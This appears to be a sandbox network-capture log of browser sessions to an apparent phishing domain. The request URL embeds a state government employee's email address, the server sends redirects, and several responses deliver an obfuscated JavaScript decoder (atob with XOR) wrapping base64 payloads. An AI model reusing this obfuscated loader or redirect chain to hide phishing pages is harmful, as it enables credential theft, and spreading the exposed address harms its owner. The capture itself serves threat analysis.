                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://saj.mordantif.com/q8Yr/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IjU3RmNrblo0d0ZDQ21WSENZaWhoVFE9PSIsInZhbHVlIjoiVEJKOHNnZUVQRFcvN3FBTWw4RjRwK2tIZWo0Z20zcjFPTEhqMnhlL2xxTXBBVWxmbnRnZW84eTQ0Y0hXZDRjYVpENUJObnRJUGlhdElvR0Y3RGlFcm1Xdm4zNmpvbHp3WjNvZFpKcUM3TCtGRE00cmhOdTdGMnBTUWptaDRHWVMiLCJtYWMiOiJjNDdiNGNmZWJiMzUyODY0MmVhYjQ4ZTE0ZTQ4NjRmMzJlYTU0MWY4YWE1ZDIxODljZjJjMzk4OTliNTEwYWNiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjZtZk5RUU56OXg2Z0l6Q3JZZk56Tmc9PSIsInZhbHVlIjoiVXN3djJGemw4MlRvVWgwbVJqOHo1NDdHSzQ0WWptNzIwOVNBVDh1L1dJY0NLOUdyTHZEVVNaTkliY1k4ZE9mSWs1dFdRRmduYWJUdWZvRTZrQ0plS1B3THhqbVJpQXFlcFkxUk56NGRBTndUSDg1M0VnZ2dyaEQyOW84a2ZVbEwiLCJtYWMiOiIzMjRmMTRiY2FhODcyMTFhOTg4NDY2YTc0OTczY2RkMzMzZjQ0YmMxMjdmYzFhM2QzYzNhNjU2Y2Y2ZWI5ZTk3IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:02 UTC1007INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4Txcw%2F%2BVdfTg6O6rl3XuO7TKhG8GYGgJ9LZT9gCdwaCsyIwkKIzOy7JQnx9JCr7ttLMzGSaTzms14I2KJnQ0w7ltVytViSbNcNsrT%2B%2F2ICmbyDPrOU29PuGz49S0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlhqWnVhS0Q2VzBZcnQ1L2drWFo5amc9PSIsInZhbHVlIjoiNG9idFN2YlZTeGREcXp5anFNMFhHRnkrcmRDSTlBSTBxdVByTUlhMXZ2bVlSdzkyK1FVWXdTbDR5Sk1VeEV5QVluVWF0R2lRZkFIRW9za1cvS3VkVjQ5ZEpLc3hOSCtsaDdwZWNaNWlwb1hWeXpTU1RXdGRGeVF0V0xsYU1ZZnciLCJtYWMiOiI2YjM4NTNjODdiOTlkYzRmNmVkNTNkYzQ0NmUxZjUyYTQ1NzJhM2I5ZTM4M2E3YTk2NmY4OGZjNzU0YzYzNWQ4IiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:07:02 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:02 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 45 33 62 47 63 72 65 56 5a 77 59 32 4e 76 51 54 4e 4f 61 33 45 34 4e 32 78 44 4e 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 56 52 75 5a 6a 68 55 64 6b 74 6c 62 57 6c 72 54 6c 52 59 63 6b 35 4d 4e 58 5a 55 51 57 64 49 4e 6d 6c 74 52 54 68 77 4f 47 64 75 62 47 46 6a 63 6e 52 42 5a 6a 64 58 61 7a 4d 35 65 6d 52 75 5a 58 4e 74 64 30 70 57 55 6a 5a 33 4f 55 52 45 4d 56 46 46 53 30 46 6e 55 6d 34 30 4f 58 45 79 63 57 6c 4a 56 6e 42 42 53 30 70 79 62 32 39 70 55 69 73 34 4f 55 39 72 64 7a 4a 61 56 6b 70 76 56 55 6c 76 63 32 4d 78 4d 58 56 79 54 30 35 45 55 54 46 54 63 6c 46 4f 65 54 49 35 4e 33 4d 7a 57 47 73 34 63 6b 35 56 61 47 38
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImE3bGcreVZwY2NvQTNOa3E4N2xDNEE9PSIsInZhbHVlIjoieVRuZjhUdktlbWlrTlRYck5MNXZUQWdINmltRThwOGdubGFjcnRBZjdXazM5emRuZXNtd0pWUjZ3OUREMVFFS0FnUm40OXEycWlJVnBBS0pyb29pUis4OU9rdzJaVkpvVUlvc2MxMXVyT05EUTFTclFOeTI5N3MzWGs4ck5VaG8
                                                        2024-09-13 13:07:02 UTC1369INData Raw: 39 66 38 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 58 59 57 43 6d 5a 71 52 58 73 28 45 51 56 78 79 64 59 6a 4a 53 2c 20 67 49 48 59 75 4c 78 54 45 67 29 20 7b 0d 0a 6c 65 74 20 6d 6a 4b 64 64 6a 6c 52 4a 69 20 3d 20 27 27 3b 0d 0a 45 51 56 78 79 64 59 6a 4a 53 20 3d 20 61 74 6f 62 28 45 51 56 78 79 64 59 6a 4a 53 29 3b 0d 0a 6c 65 74 20 74 45 66 49 55 55 64 4c 6e 41 20 3d 20 67 49 48 59 75 4c 78 54 45 67 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 45 51 56 78 79 64 59 6a 4a 53 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 6d 6a 4b 64 64 6a 6c 52 4a 69 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 45 51 56 78 79 64 59 6a 4a 53 2e 63 68 61 72 43 6f
                                                        Data Ascii: 9f8<script>function XYWCmZqRXs(EQVxydYjJS, gIHYuLxTEg) {let mjKddjlRJi = '';EQVxydYjJS = atob(EQVxydYjJS);let tEfIUUdLnA = gIHYuLxTEg.length;for (let i = 0; i < EQVxydYjJS.length; i++) { mjKddjlRJi += String.fromCharCode(EQVxydYjJS.charCo
                                                        2024-09-13 13:07:02 UTC1190INData Raw: 57 78 55 61 4d 6c 52 31 47 44 42 68 49 45 42 6b 44 54 52 4f 61 6b 34 4d 5a 56 56 5a 61 55 67 56 46 51 4d 4d 42 43 41 57 4c 57 42 76 57 57 68 6a 62 33 74 73 57 6c 42 70 58 51 38 64 46 41 73 32 50 42 55 59 45 48 49 59 5a 48 68 66 54 47 77 55 42 53 56 59 51 45 35 56 61 46 46 73 57 6c 41 2b 58 51 64 52 4e 78 56 66 49 42 55 54 4b 45 41 41 57 6a 5a 4d 41 79 6b 4b 48 43 68 58 44 42 30 76 43 78 38 6f 46 51 64 6e 57 41 5a 57 4f 52 59 59 49 78 52 65 4f 56 55 64 58 54 59 44 48 43 6c 55 41 69 78 45 42 56 51 37 42 31 6c 6a 58 30 4a 36 47 77 34 5a 65 45 56 53 61 31 4e 65 4f 31 45 5a 57 54 6b 42 46 47 52 56 56 58 35 32 52 6c 4a 30 51 6c 59 33 58 56 6c 6e 52 67 78 46 4e 41 4d 53 4b 56 4a 66 62 41 4d 74 47 6a 39 4f 55 57 73 48 56 32 41 64 55 6a 68 53 51 6c 46 73 57 67 31
                                                        Data Ascii: WxUaMlR1GDBhIEBkDTROak4MZVVZaUgVFQMMBCAWLWBvWWhjb3tsWlBpXQ8dFAs2PBUYEHIYZHhfTGwUBSVYQE5VaFFsWlA+XQdRNxVfIBUTKEAAWjZMAykKHChXDB0vCx8oFQdnWAZWORYYIxReOVUdXTYDHClUAixEBVQ7B1ljX0J6Gw4ZeEVSa1NeO1EZWTkBFGRVVX52RlJ0QlY3XVlnRgxFNAMSKVJfbAMtGj9OUWsHV2AdUjhSQlFsWg1
                                                        2024-09-13 13:07:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.549762172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:02 UTC1448OUTGET /q8Yr/?ILhans.anderson@ag.state.mn.us HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://saj.mordantif.com/q8Yr/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlhqWnVhS0Q2VzBZcnQ1L2drWFo5amc9PSIsInZhbHVlIjoiNG9idFN2YlZTeGREcXp5anFNMFhHRnkrcmRDSTlBSTBxdVByTUlhMXZ2bVlSdzkyK1FVWXdTbDR5Sk1VeEV5QVluVWF0R2lRZkFIRW9za1cvS3VkVjQ5ZEpLc3hOSCtsaDdwZWNaNWlwb1hWeXpTU1RXdGRGeVF0V0xsYU1ZZnciLCJtYWMiOiI2YjM4NTNjODdiOTlkYzRmNmVkNTNkYzQ0NmUxZjUyYTQ1NzJhM2I5ZTM4M2E3YTk2NmY4OGZjNzU0YzYzNWQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImE3bGcreVZwY2NvQTNOa3E4N2xDNEE9PSIsInZhbHVlIjoieVRuZjhUdktlbWlrTlRYck5MNXZUQWdINmltRThwOGdubGFjcnRBZjdXazM5emRuZXNtd0pWUjZ3OUREMVFFS0FnUm40OXEycWlJVnBBS0pyb29pUis4OU9rdzJaVkpvVUlvc2MxMXVyT05EUTFTclFOeTI5N3MzWGs4ck5VaG8iLCJtYWMiOiIyYzAwYjk3MTFkNzc1ZmI2ZmEyZDRjZThmN2MxYTYyMTQyMTcxNWRkYThjYzQ4MWY2NWMyYzAxZDcxMzhlNTM2IiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:03 UTC1145INHTTP/1.1 302 Found
                                                        Date: Fri, 13 Sep 2024 13:07:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        Location: https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcOj9PCcVIoOyFXgYIA4hjzs0nOH2PhBi44ZNfEIJuFLpp51mfxrhrf%2F3pr%2B9q1JQZM35ov9ePHLbqyuVsjGNm%2BHu%2FvcwGxn9IS%2FKpY38AAc9sIRaVCoLE3t7Ak3Mw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6InhuVFNLVUltNGtHdEFWSU5nRkRCZ2c9PSIsInZhbHVlIjoiUFg1VmhVSmdhUXozNnNtWGZiUXlXSnhTRVBDNU4xSW8wSFlWQ2paeHRrSGlWekl0L3dhR1BzL1N5OXFBYlNxcEpNNm1FVm9IMUJCK1pJNVFwaWQxeUxLMm1LTXZpdDB3eFNMalZSNG1ndmJNQU1nSWcxV2tqallZaEpIM3h6MEoiLCJtYWMiOiI5MDI0MGFlNmQzZTQ3YTU3MzY3NGI2MTJmYmM1YzliOTkyMmI1ODIzY2YxYWQ3YjUxNTUyNzRkOWE4NWE4NjlmIiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:07:02 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:03 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 46 6d 63 46 68 43 51 30 63 31 53 30 39 6b 59 6d 46 30 63 57 74 53 57 47 35 4e 57 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 54 55 33 52 31 6c 45 61 7a 5a 35 63 48 41 32 4d 55 39 74 62 30 70 58 62 32 74 32 53 6c 4a 6d 61 6d 78 71 52 45 74 30 54 69 39 4d 4e 32 4a 31 62 45 64 6b 63 6e 42 61 53 32 51 78 4d 32 46 7a 63 57 70 52 5a 46 68 56 5a 54 68 44 61 6d 39 56 57 6c 59 7a 54 48 5a 4b 57 57 31 72 4e 55 6c 68 62 7a 46 35 56 6b 4e 72 59 33 4a 7a 57 45 51 7a 61 57 74 44 55 58 4d 78 55 6c 56 36 53 6d 35 30 51 6c 4a 46 56 31 56 50 4d 57 4a 79 5a 58 6c 61 53 54 49 34 54 6e 64 6f 63 57 78 6f 51 30 49 7a 63 48 63 33 64 45 46 54 4b 32 77
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkFmcFhCQ0c1S09kYmF0cWtSWG5NWHc9PSIsInZhbHVlIjoiVTU3R1lEazZ5cHA2MU9tb0pXb2t2SlJmamxqREt0Ti9MN2J1bEdkcnBaS2QxM2FzcWpRZFhVZThDam9VWlYzTHZKWW1rNUlhbzF5VkNrY3JzWEQzaWtDUXMxUlV6Sm50QlJFV1VPMWJyZXlaSTI4TndocWxoQ0IzcHc3dEFTK2w
                                                        2024-09-13 13:07:03 UTC737INData Raw: 32 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6a 2e 6d 6f 72 64 61 6e 74 69 66 2e 63 6f 6d 2f 52 54 4f 47 5a 5a 42 44 4f 44 4b 46 52 57 54 54 56 55 35 57 30 48 4d 32 59 31 34 33 53 59 32 42 4c 50 31 31 43 49 3f 66 79 67 6e 64 61 77 67 6a 65 77 71 62 72 72 6c 32 36 37 31 32 39 35 38 35 37 36 39 35 39 39 30 37 35 38 35 36 4f 35 43 45 42 46 48 42 58 43 47 36 59 4a 4f 52 46 36 54 27 22 20 2f 3e 0a 0a 20 20 20 20
                                                        Data Ascii: 2da<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T'" />
                                                        2024-09-13 13:07:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.549765172.67.148.274433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:03 UTC1507OUTGET /RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Referer: https://saj.mordantif.com/q8Yr/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhuVFNLVUltNGtHdEFWSU5nRkRCZ2c9PSIsInZhbHVlIjoiUFg1VmhVSmdhUXozNnNtWGZiUXlXSnhTRVBDNU4xSW8wSFlWQ2paeHRrSGlWekl0L3dhR1BzL1N5OXFBYlNxcEpNNm1FVm9IMUJCK1pJNVFwaWQxeUxLMm1LTXZpdDB3eFNMalZSNG1ndmJNQU1nSWcxV2tqallZaEpIM3h6MEoiLCJtYWMiOiI5MDI0MGFlNmQzZTQ3YTU3MzY3NGI2MTJmYmM1YzliOTkyMmI1ODIzY2YxYWQ3YjUxNTUyNzRkOWE4NWE4NjlmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkFmcFhCQ0c1S09kYmF0cWtSWG5NWHc9PSIsInZhbHVlIjoiVTU3R1lEazZ5cHA2MU9tb0pXb2t2SlJmamxqREt0Ti9MN2J1bEdkcnBaS2QxM2FzcWpRZFhVZThDam9VWlYzTHZKWW1rNUlhbzF5VkNrY3JzWEQzaWtDUXMxUlV6Sm50QlJFV1VPMWJyZXlaSTI4TndocWxoQ0IzcHc3dEFTK2wiLCJtYWMiOiI0ZmZkMDJmYTAwMmM1MTQ2OGUzOGFlYzNkZTM4YjFhZTZkMTEwYmY0NjRlOTE1ZWNiZjU5MjRhNWQ1NWE5NDkwIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:04 UTC1001INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Cache-Control: no-cache, private
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1F%2FhgmdVqlN8FJF1sIRHOCWVQYhKkwY5TZVhgVuRC6ThLJJ6392YSL4qKxjKJplhyWTLCLJ7DpPUGTIl6fM69ulKXwtdz6ZZkbmBPvpxehRzpzaBEoh816Oz0WY9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6ImdrN0plVFEwV1RCUnFILzFsK29BaGc9PSIsInZhbHVlIjoiOHFGZmQvNEljS2lITTVOUUJJc3FReG9FREt1dWQ5dnBGOFVZMTBMNVJoUnM4ZGcrSXl6TFBwTHozOGlvcXVmaENqYjlPRTZTbDkwUUpEVmx1dGQvSUhVejZwKzdiMDg5V0wwa2JVd21lZkNodTczMGU2SkNMRXNPRk5wcXZtamkiLCJtYWMiOiIyNjE2MzEzM2EyN2JmNzE2MTVmM2Y0MTg0NWZkM2ZhYjdmN2M3M2Y4N2QxY2Q1NTkzZmNkZDI5NDU3OTBiZDE1IiwidGFnIjoiIn0%3D; expires=Fri, 13-Sep-2024 15:07:03 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                        2024-09-13 13:07:04 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 45 35 4e 55 74 46 55 6d 4a 6f 61 31 67 32 56 6d 4a 35 61 6d 78 59 4b 30 64 57 4f 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 6e 55 31 61 44 4a 68 51 32 74 77 53 47 35 56 59 32 31 58 53 56 46 6c 62 44 4d 76 51 55 4e 6b 55 6e 6b 35 4d 46 5a 70 57 47 64 6a 4e 6e 5a 31 54 54 4e 79 52 48 42 30 56 6c 4e 51 53 6a 41 33 55 30 39 74 54 46 70 71 4d 56 5a 48 56 56 4e 6a 64 6d 39 77 53 47 4e 4c 5a 47 52 56 62 55 5a 73 52 45 46 34 5a 57 64 57 61 55 74 4e 64 58 46 55 57 46 52 44 4c 7a 6c 6c 56 55 56 4a 4c 79 74 68 4e 48 59 33 54 56 64 55 63 55 4e 33 65 6b 64 58 61 6b 56 32 64 30 70 4b 53 6b 56 69 51 6d 31 4b 56 57 35 4f 59 6a 64 51 52 57 45
                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlE5NUtFUmJoa1g2VmJ5amxYK0dWOXc9PSIsInZhbHVlIjoianU1aDJhQ2twSG5VY21XSVFlbDMvQUNkUnk5MFZpWGdjNnZ1TTNyRHB0VlNQSjA3U09tTFpqMVZHVVNjdm9wSGNLZGRVbUZsREF4ZWdWaUtNdXFUWFRDLzllVUVJLythNHY3TVdUcUN3ekdXakV2d0pKSkViQm1KVW5OYjdQRWE
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 34 65 30 39 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 43 76 6b 6c 59 66 6f 43 62 5a 28 43 6d 55 6f 4d 4c 75 77 61 46 2c 20 6f 50 47 4f 56 46 49 53 53 51 29 20 7b 0d 0a 6c 65 74 20 61 6d 4f 54 58 68 41 6b 72 72 20 3d 20 27 27 3b 0d 0a 43 6d 55 6f 4d 4c 75 77 61 46 20 3d 20 61 74 6f 62 28 43 6d 55 6f 4d 4c 75 77 61 46 29 3b 0d 0a 6c 65 74 20 70 6c 68 43 5a 4d 78 67 4b 79 20 3d 20 6f 50 47 4f 56 46 49 53 53 51 2e 6c 65 6e 67 74 68 3b 0d 0a 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 43 6d 55 6f 4d 4c 75 77 61 46 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 20 20 20 20 61 6d 4f 54 58 68 41 6b 72 72 20 2b 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 43 6d 55 6f 4d 4c 75 77 61 46 2e 63 68 61 72 43
                                                        Data Ascii: 4e09<script>function CvklYfoCbZ(CmUoMLuwaF, oPGOVFISSQ) {let amOTXhAkrr = '';CmUoMLuwaF = atob(CmUoMLuwaF);let plhCZMxgKy = oPGOVFISSQ.length;for (let i = 0; i < CmUoMLuwaF.length; i++) { amOTXhAkrr += String.fromCharCode(CmUoMLuwaF.charC
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 35 55 51 49 46 41 6e 64 58 4d 7a 34 6b 4a 55 45 49 41 78 6b 35 56 32 78 64 51 57 73 59 52 55 78 51 4a 68 77 38 4f 32 73 35 58 51 6c 52 54 6a 6f 48 4e 7a 77 6b 4b 6c 78 48 54 41 51 34 45 44 52 74 61 58 6f 4b 4c 6a 55 37 4c 52 77 6a 59 51 67 43 61 43 38 59 44 77 74 41 5a 44 51 6b 50 77 6b 6b 43 53 45 37 42 32 64 67 61 57 74 5a 46 6c 46 4f 4c 42 6f 38 4a 47 6c 72 54 42 77 63 43 58 64 58 4e 44 38 6c 50 78 63 53 41 77 6f 73 56 33 49 7a 4f 53 52 4c 46 67 4d 65 49 78 49 37 50 6e 5a 70 57 51 73 44 41 6a 4d 59 50 53 55 34 61 51 5a 6f 5a 6b 78 71 56 58 4a 73 4a 79 4a 57 44 6b 77 65 4c 78 6c 76 63 6a 73 35 58 51 6b 44 44 53 35 58 63 6a 67 35 4c 6c 35 59 54 6c 6c 38 4a 7a 63 41 42 78 45 50 4d 44 59 42 41 69 46 67 59 33 74 34 44 69 67 70 47 54 78 44 59 6e 4a 72 4b 6b
                                                        Data Ascii: 5UQIFAndXMz4kJUEIAxk5V2xdQWsYRUxQJhw8O2s5XQlRTjoHNzwkKlxHTAQ4EDRtaXoKLjU7LRwjYQgCaC8YDwtAZDQkPwkkCSE7B2dgaWtZFlFOLBo8JGlrTBwcCXdXND8lPxcSAwosV3IzOSRLFgMeIxI7PnZpWQsDAjMYPSU4aQZoZkxqVXJsJyJWDkweLxlvcjs5XQkDDS5Xcjg5Ll5YTll8JzcABxEPMDYBAiFgY3t4DigpGTxDYnJrKk
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 50 53 55 6c 4c 78 55 4d 41 51 30 74 45 47 68 77 50 6a 6c 55 54 55 74 44 49 52 6c 6a 43 43 45 62 63 79 30 43 4b 79 49 6e 4e 69 63 48 44 57 38 4e 49 51 31 35 45 47 74 6d 41 51 5a 55 58 46 6b 43 4f 53 64 71 49 68 67 4a 55 52 49 4a 41 43 59 63 4f 43 45 4b 43 55 38 6e 49 53 67 38 47 51 59 46 42 51 46 58 55 31 34 4e 43 42 59 61 42 41 77 63 54 78 31 65 58 6e 70 53 65 32 74 47 51 52 68 46 54 45 78 71 56 58 4a 77 61 32 73 59 52 51 34 4e 4b 52 34 31 49 69 51 2b 56 67 46 42 48 69 38 46 4e 7a 45 2f 63 52 67 4c 41 30 45 34 45 43 49 31 4b 6a 38 55 43 77 4e 42 4f 42 41 69 4e 53 6f 2f 41 32 68 6d 54 47 70 56 63 6e 42 72 61 78 68 46 54 45 78 71 46 7a 4d 7a 49 43 78 4b 43 68 6b 43 4c 6c 67 69 50 7a 67 69 54 41 77 44 41 6e 42 56 4d 54 55 6c 50 31 30 58 54 41 38 76 47 79 59
                                                        Data Ascii: PSUlLxUMAQ0tEGhwPjlUTUtDIRljCCEbcy0CKyInNicHDW8NIQ15EGtmAQZUXFkCOSdqIhgJURIJACYcOCEKCU8nISg8GQYFBQFXU14NCBYaBAwcTx1eXnpSe2tGQRhFTExqVXJwa2sYRQ4NKR41IiQ+VgFBHi8FNzE/cRgLA0E4ECI1Kj8UCwNBOBAiNSo/A2hmTGpVcnBraxhFTExqFzMzICxKChkCLlgiPzgiTAwDAnBVMTUlP10XTA8vGyY
                                                        2024-09-13 13:07:04 UTC1369INData Raw: 45 78 71 56 58 4a 77 61 32 73 59 52 51 34 4e 4b 52 34 31 49 69 51 2b 56 67 46 42 48 79 4d 50 4e 32 70 72 65 67 68 56 53 55 78 37 52 57 4a 31 63 45 59 79 52 55 78 4d 61 6c 56 79 63 47 74 72 47 45 56 4d 47 79 4d 52 4a 6a 68 78 61 77 6c 56 56 42 77 79 54 6c 39 61 61 32 73 59 52 55 78 4d 61 6c 56 79 63 47 74 72 55 41 41 46 43 79 49 42 61 48 42 35 66 30 67 64 56 32 46 41 56 58 4a 77 61 32 73 59 52 55 78 4d 61 6c 56 79 4d 69 6f 6f 55 77 49 65 41 7a 38 62 4e 6e 30 35 4c 6b 67 41 44 52 68 77 56 54 77 2f 5a 6a 6c 64 46 51 6b 4e 50 6b 35 66 57 6d 74 72 47 45 56 4d 54 47 70 56 4c 31 31 42 61 78 68 46 54 45 78 71 56 58 4a 2b 4b 53 70 57 43 77 6b 65 4a 68 6f 31 50 7a 42 47 4d 6b 56 4d 54 47 70 56 63 6e 42 72 61 78 68 46 54 41 51 76 48 44 55 34 50 33 45 59 56 31 67 63
                                                        Data Ascii: ExqVXJwa2sYRQ4NKR41IiQ+VgFBHyMPN2preghVSUx7RWJ1cEYyRUxMalVycGtrGEVMGyMRJjhxawlVVBwyTl9aa2sYRUxMalVycGtrUAAFCyIBaHB5f0gdV2FAVXJwa2sYRUxMalVyMiooUwIeAz8bNn05LkgADRhwVTw/ZjldFQkNPk5fWmtrGEVMTGpVL11BaxhFTExqVXJ+KSpWCwkeJho1PzBGMkVMTGpVcnBraxhFTAQvHDU4P3EYV1gc
